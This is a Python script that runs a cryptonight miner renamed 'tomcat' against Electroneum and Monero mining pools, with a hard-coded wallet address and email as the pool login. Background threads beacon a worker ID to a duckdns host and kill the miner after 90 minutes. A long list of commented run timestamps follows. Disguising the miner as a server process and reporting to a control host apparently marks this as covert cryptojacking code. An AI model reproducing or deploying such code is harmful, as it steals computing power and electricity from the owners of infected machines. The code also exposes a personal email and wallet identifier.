import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:05.023760
#2018-02-17 17:27:03.414599
#2018-02-17 19:16:01.411608
#2018-02-17 21:04:05.431409
#2018-02-17 22:49:05.750303
#2018-02-18 00:33:05.625151
#2018-02-18 02:23:03.843142
#2018-02-18 04:10:07.034032
#2018-02-18 06:01:06.757746
#2018-02-18 07:51:04.590095
#2018-02-18 09:38:06.154562
#2018-02-18 11:25:03.096830
#2018-02-18 13:11:07.040046
#2018-02-18 14:59:01.653863
#2018-02-18 16:48:04.356301
#2018-02-18 18:36:05.304589
#2018-02-18 20:24:08.259302
#2018-02-18 22:10:08.345909
#2018-02-18 23:59:04.148261
#2018-02-19 01:45:08.854678
#2018-02-19 03:33:04.519106
#2018-02-19 05:18:04.154746
#2018-02-19 07:04:05.909966
#2018-02-19 08:53:05.420855
#2018-02-19 10:42:08.466828
#2018-02-19 12:31:05.050382
#2018-02-19 14:18:10.315304
#2018-02-19 16:06:07.406949
#2018-02-19 17:52:10.336460
#2018-02-19 19:40:09.924453
#2018-02-19 21:28:07.794860
#2018-02-19 23:14:08.294863
#2018-02-20 01:01:07.040930
#2018-02-20 02:49:06.712711
#2018-02-20 04:36:06.432544
#2018-02-20 06:20:04.619786
#2018-02-20 08:05:06.652332
#2018-02-20 09:50:09.407032
#2018-02-20 11:34:08.411121
#2018-02-20 13:22:06.465194
#2018-02-20 15:07:05.982248
#2018-02-20 16:53:06.952736
#2018-02-20 18:42:08.932178
#2018-02-20 20:32:01.344799
#2018-02-20 22:16:07.607943
#2018-02-20 23:58:06.959710
#2018-02-21 01:44:07.369546
#2018-02-21 03:33:04.580430
#2018-02-21 05:22:01.541677
#2018-02-21 07:09:06.915394
#2018-02-21 08:56:06.235687
#2018-02-21 10:44:11.930210
#2018-02-21 12:30:12.460391
#2018-02-21 14:18:06.478753
#2018-02-21 16:06:07.169949
#2018-02-21 17:57:08.308133
#2018-02-21 19:44:07.189005
#2018-02-21 21:32:07.604574
#2018-02-21 23:17:01.426464
#2018-02-22 01:06:04.322171
#2018-02-22 02:53:05.095530
#2018-02-22 04:39:01.656460
#2018-02-22 06:23:05.823111
#2018-02-22 08:10:09.651288
#2018-02-22 09:58:01.748498
#2018-02-22 11:42:04.994293
#2018-02-22 13:27:09.148571
#2018-02-22 15:16:06.261445
#2018-02-22 16:59:07.813816
#2018-02-22 18:47:08.784180
#2018-02-22 20:40:03.973990
#2018-02-22 22:24:05.717769
#2018-02-23 00:11:04.362247
#2018-02-23 01:59:05.383968
#2018-02-23 03:44:05.620398
#2018-02-23 05:32:06.085132
#2018-02-23 07:18:07.272128
#2018-02-23 09:22:01.444093
#2018-02-23 11:27:06.784581
#2018-02-23 13:16:06.094205
#2018-02-23 15:01:04.415954
#2018-02-23 16:49:05.779787
#2018-02-23 18:44:06.232333
#2018-02-23 20:33:04.051471
#2018-02-23 22:21:05.984543
#2018-02-24 00:06:04.795750
#2018-02-24 01:56:05.245940
#2018-02-24 03:48:05.740373
#2018-02-24 05:31:05.154204
#2018-02-24 07:17:07.034376
#2018-02-24 09:07:06.909958
#2018-02-24 10:43:05.804970
#2018-02-24 12:31:07.491333
#2018-02-24 14:09:03.553517
#2018-02-24 15:44:01.567895
#2018-02-24 17:19:05.795748
#2018-02-24 18:50:03.804903
#2018-02-24 20:22:03.720227
#2018-02-24 21:50:05.482628
#2018-02-25 00:31:07.223643
#2018-02-25 02:37:07.426684
#2018-02-25 06:14:03.914115
#2018-02-25 11:40:01.933782